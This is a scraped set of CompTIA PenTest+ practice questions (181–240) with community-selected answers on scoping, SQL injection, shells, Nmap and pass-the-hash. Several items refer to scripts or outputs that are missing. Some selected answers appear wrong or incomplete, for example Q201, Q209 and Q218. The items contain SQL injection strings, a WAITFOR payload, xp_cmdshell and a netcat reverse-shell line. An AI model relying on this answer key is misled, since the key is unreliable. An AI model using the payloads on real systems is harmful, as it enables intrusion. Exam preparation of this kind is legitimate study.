PT0-002: CompTIA PenTest+ Certification Exam

Question #: 181
Topic #: 1
Given the following script:

Which of the following BEST characterizes the function performed by lines 5 and 6?

A. Retrieves the start-of-authority information for the zone on DNS server 10.10.10.10
B. Performs a single DNS query for www.comptia.org and prints the raw data output
C. Loops through variable b to count the results returned for the DNS query and prints that count to screen
D. Prints each DNS query result already stored in variable b

Selected Answer: D

Question #: 182
Topic #: 1
A penetration-testing team needs to test the security of electronic records in a company’s office. Per the terms of engagement, the penetration test is to be conducted after hours and should not include circumventing the alarm or performing destructive entry. During outside reconnaissance, the team sees an open door from an adjoining building. Which of the following would be allowed under the terms of the engagement?

A. Prying the lock open on the records room
B. Climbing in an open window of the adjoining building
C. Presenting a false employee ID to the night guard
D. Obstructing the motion sensors in the hallway of the records room

Selected Answer: C

Question #: 183
Topic #: 1
A penetration tester discovers during a recent test that an employee in the accounting department had been making changes to a payment system and redirecting money into a personal bank account. The penetration test was immediately stopped. Which of the following would be the BEST recommendation to discourage this type of activity in the future?

A. Enforce mandatory employee vacations.
B. Implement multifactor authentication.
C. Install video surveillance equipment in the office.
D. Encrypt passwords for bank account information.

Selected Answer: A

Question #: 184
Topic #: 1
A penetration tester who is working remotely is conducting a penetration test using a wireless connection. Which of the following is the BEST way to provide confidentiality for the client while using this connection?

A. Configure wireless access to use a AAA server.
B. Use random MAC addresses on the penetration testing distribution.
C. Install a host-based firewall on the penetration testing distribution.
D. Connect to the penetration testing company’s VPS using a VPN.

Selected Answer: D

Question #: 185
Topic #: 1
A penetration tester is able to use a command injection vulnerability in a web application to get a reverse shell on a system After running a few commands, the tester runs the following:

python -c ‘import pty; pty.spawn(“/bin/bash”)’

Which of the following actions Is the penetration tester performing?

A. Privilege escalation
B. Upgrading the shell
C. Writing a script for persistence
D. Building a bind shell

Selected Answer: B

Question #: 186
Topic #: 1
A penetration tester opened a shell on a laptop at a client’s office but is unable to pivot because of restrictive ACLs on the wireless subnet. The tester is also aware that all laptop users have a hard-wired connection available at their desks. Which of the following is the BEST method available to pivot and gain additional access to the network?

A. Set up a captive portal with embedded malicious code.
B. Capture handshakes from wireless clients to crack.
C. Span deauthentication packets to the wireless clients.
D. Set up another access point and perform an evil twin attack.

Selected Answer: D

Question #: 187
Topic #: 1
A tester who is performing a penetration test discovers an older firewall that is known to have serious vulnerabilities to remote attacks but is not part of the original list of IP addresses for the engagement. Which of the following is the BEST option for the tester to take?

A. Segment the firewall from the cloud.
B. Scan the firewall for vulnerabilities.
C. Notify the client about the firewall.
D. Apply patches to the firewall.

Selected Answer: C

Question #: 188
Topic #: 1
A penetration tester is looking for vulnerabilities within a company’s web application that are in scope. The penetration tester discovers a login page and enters the following string in a field:

1;SELECT Username, Password FROM Users;

Which of the following injection attacks is the penetration tester using?

A. Blind SQL
B. Boolean SQL
C. Stacked queries
D. Error-based

Selected Answer: C

Question #: 189
Topic #: 1
Which of the following can be used to store alphanumeric data that can be fed into scripts or programs as input to penetration-testing tools?

A. Dictionary
B. Directory
C. Symlink
D. Catalog
E. For-loop

Selected Answer: A

Question #: 190
Topic #: 1
A penetration tester is trying to restrict searches on Google to a specific domain. Which of the following commands should the penetration tester consider?

A. inurl:
B. link:
C. site:
D. intitle:

Selected Answer: C

Question #: 191
Topic #: 1
A client would like to have a penetration test performed that leverages a continuously updated TTPs framework and covers a wide variety of enterprise systems and networks. Which of the following methodologies should be used to BEST meet the client’s expectations?

A. OWASP Top 10
B. MITRE ATT&CK framework
C. NIST Cybersecurity Framework
D. The Diamond Model of Intrusion Analysis

Selected Answer: B

Question #: 192
Topic #: 1
During a web application test, a penetration tester was able to navigate to https://company.com and view all links on the web page. After manually reviewing the pages, the tester used a web scanner to automate the search for vulnerabilities. When returning to the web application, the following message appeared in the browser: unauthorized to view this page. Which of the following BEST explains what occurred?

A. The SSL certificates were invalid.
B. The tester IP was blocked.
C. The scanner crashed the system.
D. The web page was not found.

Selected Answer: B

Question #: 193
Topic #: 1
A red team completed an engagement and provided the following example in the report to describe how the team gained access to a web server:

x’ OR role LIKE ‘%admin%

Which of the following should be recommended to remediate this vulnerability?

A. Multifactor authentication
B. Encrypted communications
C. Secure software development life cycle
D. Parameterized queries

Selected Answer: D

Question #: 194
Topic #: 1
The following output is from reconnaissance on a public-facing banking website:

Based on these results, which of the following attacks is MOST likely to succeed?

A. A birthday attack on 64-bit ciphers (Sweet32)
B. An attack that breaks RC4 encryption
C. An attack on a session ticket extension (Ticketbleed)
D. A Heartbleed attack

Selected Answer: B

Question #: 195
Topic #: 1
Which of the following documents is agreed upon by all parties associated with the penetration-testing engagement and defines the scope, contacts, costs, duration, and deliverables?

A. SOW
B. SLA
C. MSA
D. NDA

Selected Answer: A

Question #: 196
Topic #: 1
In Python socket programming, SOCK_DGRAM type is:

A. reliable.
B. matrixed.
C. connectionless.
D. slower.

Selected Answer: C

Question #: 197
Topic #: 1
Which of the following is the MOST important information to have on a penetration testing report that is written for the developers?

A. Executive summary
B. Remediation
C. Methodology
D. Metrics and measures

Selected Answer: B

Question #: 198
Topic #: 1
After gaining access to a Linux system with a non-privileged account, a penetration tester identifies the following file:

Which of the following actions should the tester perform FIRST?

A. Change the file permissions.
B. Use privilege escalation.
C. Cover tracks.
D. Start a reverse shell.

Selected Answer: D

Question #: 199
Topic #: 1
Which of the following types of assessments MOST likely focuses on vulnerabilities with the objective to access specific data?

A. An unknown-environment assessment
B. A known-environment assessment
C. A red-team assessment
D. A compliance-based assessment

Selected Answer: C

Question #: 200
Topic #: 1
A penetration tester initiated the transfer of a large data set to verify a proof-of-concept attack as permitted by the ROE. The tester noticed the client’s data included PII, which is out of scope, and immediately stopped the transfer. Which of the following MOST likely explains the penetration tester’s decision?

A. The tester had the situational awareness to stop the transfer.
B. The tester found evidence of prior compromise within the data set.
C. The tester completed the assigned part of the assessment workflow.
D. The tester reached the end of the assessment time frame.

Selected Answer: A

Question #: 201
Topic #: 1
A penetration tester exploited a vulnerability on a server and remotely ran a payload to gain a shell. However, a connection was not established, and no errors were shown on the payload execution. The penetration tester suspected that a network device, like an IPS or next-generation firewall, was dropping the connection. Which of the following payloads are MOST likely to establish a shell successfully?

A. windows/x64/meterpreter/reverse_tcp
B. windows/x64/meterpreter/reverse_http
C. windows/x64/shell_reverse_tcp
D. windows/x64/powershell_reverse_tcp
E. windows/x64/meterpreter/reverse_https

Selected Answer: A

Question #: 202
Topic #: 1
A penetration tester has been hired to examine a website for flaws. During one of the time windows for testing, a network engineer notices a flood of GET requests to the web server, reducing the website’s response time by 80%. The network engineer contacts the penetration tester to determine if these GET requests are part of the test. Which of the following BEST describes the purpose of checking with the penetration tester?

A. Situational awareness
B. Rescheduling
C. DDoS defense
D. Deconfliction

Selected Answer: D

Question #: 203
Topic #: 1
Which of the following is the BEST resource for obtaining payloads against specific network infrastructure products?

A. Exploit-DB
B. Metasploit
C. Shodan
D. Retina

Selected Answer: B

Question #: 204
Topic #: 1
A penetration tester gives the following command to a systems administrator to execute on one of the target servers:

rm -f /var/www/html/G679h32gYu.php

Which of the following BEST explains why the penetration tester wants this command executed?

A. To trick the systems administrator into installing a rootkit
B. To close down a reverse shell
C. To remove a web shell after the penetration test
D. To delete credentials the tester created

Selected Answer: C

Question #: 205
Topic #: 1
The following PowerShell snippet was extracted from a log of an attacker machine:

A penetration tester would like to identify the presence of an array. Which of the following line numbers would define the array?

A. Line 8
B. Line 13
C. Line 19
D. Line 20

Selected Answer: A

Question #: 206
Topic #: 1
A company provided the following network scope for a penetration test:

• 169.137.1.0/24
• 221.10.1.0/24
• 149.14.1.0/24

A penetration tester discovered a remote command injection on IP address 149.14.1.24 and exploited the system. Later, the tester learned that this particular IP address belongs to a third party. Which of the following stakeholders is responsible for this mistake?

A. The company that requested the penetration test
B. The penetration testing company
C. The target host’s owner
D. The penetration tester
E. The subcontractor supporting the test

Selected Answer: D

Question #: 207
Topic #: 1
In an unprotected network file repository, a penetration tester discovers a text file containing usernames and passwords in cleartext and a spreadsheet containing data for 50 employees, including full names, roles, and serial numbers. The tester realizes some of the passwords in the text file follow the format: . Which of the following would be the best action for the tester to take NEXT with this information?

A. Create a custom password dictionary as preparation for password spray testing.
B. Recommend using a password manager/vault instead of text files to store passwords securely.
C. Recommend configuring password complexity rules in all the systems and applications.
D. Create a TPM-backed sealed storage location within which the unprotected file repository can be reported.

Selected Answer: A

Question #: 208
Topic #: 1
During the reconnaissance phase, a penetration tester obtains the following output:

Reply from 192.168.1.23: bytes=32 time<54ms TTL=128 Reply from 192.168.1.23: bytes=32 time<53ms TTL=128 Reply from 192.168.1.23: bytes=32 time<60ms TTL=128 Reply from 192.168.1.23: bytes=32 time<51ms TTL=128 Which of the following operating systems is MOST likely installed on the host? A. Linux - В. NetBSD C. Windows D. macOS Selected Answer: C Question #: 209 Topic #: 1 A penetration tester joins the assessment team in the middle of the assessment. The client has asked the team, both verbally and in the scoping document, not to test the production networks. However, the new tester is not aware of this request and proceeds to perform exploits in the production environment. Which of the following would have MOST effectively prevented this misunderstanding? A. Prohibiting exploitation in the production environment B. Requiring all testers to review the scoping document carefully C. Never assessing the production networks D. Prohibiting testers from joining the team during the assessment Selected Answer: D Question #: 210 Topic #: 1 User credentials were captured from a database during an assessment and cracked using rainbow tables. Based on the ease of compromise, which of the following algorithms was MOST likely used to store the passwords in the database? A. MD5 B. bcrypt C. SHA-1 D. PBKDF2 Selected Answer: A Question #: 211 Topic #: 1 A penetration tester attempted a DNS poisoning attack. After the attempt, no traffic was seen from the target machine. Which of the following MOST likely caused the attack to fail? A. The injection was too slow. B. The DNS information was incorrect. C. The DNS cache was not refreshed. D. The client did not receive a trusted response. Selected Answer: D Question #: 212 Topic #: 1 During an assessment, a penetration tester was able to access the organization's wireless network from outside of the building using a laptop running Aircrack-ng. Which of the following should be recommended to the client to remediate this issue? A. Changing to Wi-Fi equipment that supports strong encryption B. Using directional antennae C. Using WEP encryption D. Disabling Wi-Fi Selected Answer: B Question #: 213 Topic #: 1 A penetration tester is conducting a penetration test and discovers a vulnerability on a web server that is owned by the client. Exploiting the vulnerability allows the tester to open a reverse shell. Enumerating the server for privilege escalation, the tester discovers the following: Which of the following should the penetration tester do NEXT? A. Close the reverse shell the tester is using. B. Note this finding for inclusion in the final report. C. Investigate the high numbered port connections. D. Contact the client immediately. Selected Answer: C Question #: 214 Topic #: 1 A penetration tester successfully performed an exploit on a host and was able to hop from VLAN 100 to VLAN 200. VLAN 200 contains servers that perform financial transactions, and the penetration tester now wants the local interface of the attacker machine to have a static ARP entry in the local cache. The attacker machine has the following: IP Address: 192.168.1.63 - Physical Address: 60-36-dd-a6-c5-33 Which of the following commands would the penetration tester MOST likely use in order to establish a static ARP entry successfully? A. tcpdump -i eth01 arp and arp[6:2] == 2 B. arp -s 192.168.1.63 60-36-DD-A6-C5-33 C. ipconfig /all findstr /v 00-00-00 | findstr Physical D. route add 192.168.1.63 mask 255.255.255.255.0 192.168.1.1 Selected Answer: B Question #: 215 Topic #: 1 During an internal penetration test against a company, a penetration tester was able to navigate to another part of the network and locate a folder containing customer information such as addresses, phone numbers, and credit card numbers. To be PCI compliant, which of the following should the company have implemented to BEST protect this data? A. Vulnerability scanning B. Network segmentation C. System hardening D. Intrusion detection Selected Answer: B Question #: 216 Topic #: 1 A security analyst needs to perform a scan for SMB port 445 over a/16 network. Which of the following commands would be the BEST option when stealth is not a concern and the task is time sensitive? A. Nmap -s 445 -Pn -T5 172.21.0.0/16 B. Nmap -p 445 -n -T4 -open 172.21.0.0/16 С. Nmap -sV --script=smb* 172.21.0.0/16 D. Nmap -p 445 -max -sT 172. 21.0.0/16 Selected Answer: B Question #: 217 Topic #: 1 Penetration tester has discovered an unknown Linux 64-bit executable binary. Which of the following tools would be BEST to use to analyze this issue? A. Peach B. WinDbg C. GDB D. OllyDbg Selected Answer: C Question #: 218 Topic #: 1 A penetration tester found several critical SQL injection vulnerabilities during an assessment of a client's system. The tester would like to suggest mitigation to the client as soon as possible. Which of the following remediation techniques would be the BEST to recommend? (Choose two.) A. Closing open services B. Encryption users' passwords C. Randomizing users' credentials D. Users' input validation E. Parameterized queries F. Output encoding Selected Answer: D Question #: 219 Topic #: 1 Which of the following is a rules engine for managing public cloud accounts and resources? A. Cloud Custodian B. Cloud Brute C. Pacu D. Scout Suite Selected Answer: A Question #: 220 Topic #: 1 A penetration tester will be performing a vulnerability scan as part of the penetration test on a client's website. The tester plans to run several Nmap scripts that probe for vulnerabilities while avoiding detection. Which of the following Nmap options will the penetration tester MOST likely utilize? A. -а8 -T0 B. --script "http*vuln*" C. -sn D. -O -A Selected Answer: B Question #: 221 Topic #: 1 A penetration tester discovered that a client uses cloud mail as the company's email system. During the penetration test, the tester set up a fake cloud mail login page and sent all company employees an email that stated their inboxes were full and directed them to the fake login page to remedy the issue. Which of the following BEST describes this attack? A. Credential harvesting B. Privilege escalation C. Password spraying D. Domain record abuse Selected Answer: A Question #: 222 Topic #: 1 During an assessment, a penetration tester obtains a list of 30 email addresses by crawling the target company's website and then creates a list of possible usernames based on the email address format. Which of the following types of attacks would MOST likely be used to avoid account lockout? A. Mask B. Rainbow C. Dictionary D. Password spraying Selected Answer: D Question #: 223 Topic #: 1 The attacking machine is on the same LAN segment as the target host during an internal penetration test. Which of the following commands will BEST enable the attacker to conduct host discovery and write the discovery to files without returning results of the attack machine? A. nmap -sn -n -exclude 10.1.1.15 10.1.1.0/24 -oA target_txt B. nmap -iR 10 -n -oX out.xml | grep "Nmap" | cut -d "" -f5 > live-hosts.txt
C. nmap -Pn -sV -O -iL target.txt -oA target_text_Service
D. nmap -sS -Pn -n -iL target.txt -oA target_txt1

Selected Answer: A

Question #: 224
Topic #: 1
Which of the following tools should a penetration tester use to crawl a website and build a wordlist using the data recovered to crack the password on the website?

A. DirBuster
B. CeWL
C. w3af
D. Patator

Selected Answer: B

Question #: 225
Topic #: 1
A penetration tester examines a web-based shopping catalog and discovers the following URL when viewing a product in the catalog:

http://company.com/catalog.asp?productid=22

The penetration tester alters the URL in the browser to the following and notices a delay when the page refreshes:

http://company.com/catalog.asp?productid=22;WAITFOR DELAY’00:00:05′

Which of the following should the penetration tester attempt NEXT?

A. http://company.com/catalog.asp?productid=22:EXEC xp_cmdshell ‘whoami’
B. http://company.com/catalog.asp?productid=22′ OR 1=1 —
C. http://company.com/catalog.asp?productid=22′ UNION SELECT 1,2,3 —
D. http://company.com/catalog.asp?productid=22;nc 192.168.1.22 4444 -e /bin/bash

Selected Answer: B

Question #: 226
Topic #: 1
The output from a penetration testing tool shows 100 hosts contained findings due to improper patch management. Which of the following did the penetration tester perform?

A. A vulnerability scan
B. A WHOIS lookup
C. A packet capture
D. An Nmap scan

Selected Answer: A

Question #: 227
Topic #: 1
After running the enum4linux.pl command, a penetration tester received the following output:

Which of the following commands should the penetration tester run NEXT?

A. smbspool //192.160.100.56/print$
B. net rpc share -S 192.168.100.56 -U ”
C. smbget //192.168.100.56/web -U ”
D. smbclient //192.168.100.56/web -U ” -N

Selected Answer: C

Question #: 228
Topic #: 1
During an assessment, a penetration tester gathered OSINT for one of the IT systems administrators from the target company and managed to obtain valuable information, including corporate email addresses. Which of the following techniques should the penetration tester perform NEXT?

A. Badge cloning
B. Watering-hole attack
C. Impersonation
D. Spear phishing

Selected Answer: D

Question #: 229
Topic #: 1
Which of the following compliance requirements would be BEST suited in an environment that processes credit card data?

A. PCI DSS
B. ISO 27001
C. SOX
D. GDPR

Selected Answer: A

Question #: 230
Topic #: 1
A penetration tester successfully infiltrated the targeted web server and created credentials with administrative privileges. After conducting data exfiltration, which of the following should be the tester’s NEXT step?

A. Determine what data is available on the web server.
B. Change or delete the logs.
C. Log out and migrate to a new session.
D. Log in as the new user.

Selected Answer: B

Question #: 231
Topic #: 1
A penetration tester analyzed a web-application log file and discovered an input that was sent to the company’s web application. The input contains a string that says “WAITFOR.” Which of the following attacks is being attempted?

A. SQL injection
B. HTML injection
C. Remote command injection
D. DLL injection

Selected Answer: A

Question #: 232
Topic #: 1
Given the following code:

Which of the following data structures is systems?

A. A tuple
B. A tree
C. An array
D. A dictionary

Selected Answer: D

Question #: 233
Topic #: 1
A penetration tester who is performing an engagement notices a specific host is vulnerable to EternalBlue. Which of the following would BEST protect against this vulnerability?

A. Network segmentation
B. Key rotation
C. Encrypted passwords
D. Patch management

Selected Answer: D

Question #: 234
Topic #: 1
The delivery of a penetration test within an organization requires defining specific parameters regarding the nature and types of exercises that can be conducted and when they can be conducted. Which of the following BEST identifies this concept?

A. Statement of work
B. Program scope
C. Non-disclosure agreement
D. Rules of engagement

Selected Answer: D

Question #: 235
Topic #: 1
A penetration tester has extracted password hashes from the lsass.exe memory process. Which of the following should the tester perform NEXT to pass the hash and provide persistence with the newly acquired credentials?

A. Use Patator to pass the hash and Responder for persistence.
B. Use Hashcat to pass the hash and Empire for persistence.
C. Use a bind shell to pass the hash and WMI for persistence.
D. Use Mimikatz to pass the hash and PsExec for persistence.

Selected Answer: D

Question #: 236
Topic #: 1
The provision that defines the level of responsibility between the penetration tester and the client for preventing unauthorized disclosure is found in the:

A. NDA
B. SLA
C. MSA
D. SOW

Selected Answer: A

Question #: 237
Topic #: 1
A penetration tester created the following script to use in an engagement:

However, the tester is receiving the following error when trying to run the script:

Which of the following is the reason for the error?

A. The sys variable was not defined.
B. The argv variable was not defined.
C. The sys module was not imported.
D. The argv module was not imported.

Selected Answer: C

Question #: 238
Topic #: 1
A penetration tester was able to compromise a web server and move laterally into a Linux web server. The tester now wants to determine the identity of the last user who signed in to the web server. Which of the following log files will show this activity?

A. /var/log/messages
B. /var/log/last_user
C. /var/log/user_log
D. /var/log/lastlog

Selected Answer: D

Question #: 239
Topic #: 1
A penetration tester is conducting an engagement against an internet-facing web application and planning a phishing campaign. Which of the following is the BEST passive method of obtaining the technical contacts for the website?

A. WHOIS domain lookup
B. Job listing and recruitment ads
C. SSL certificate information
D. Public data breach dumps

Selected Answer: A

Question #: 240
Topic #: 1
Which of the following tools would BEST allow a penetration tester to capture wireless handshakes to reveal a Wi-Fi password from a Windows machine?

A. Wireshark
B. EAPHammer
C. Kismet
D. Aircrack-ng

Selected Answer: D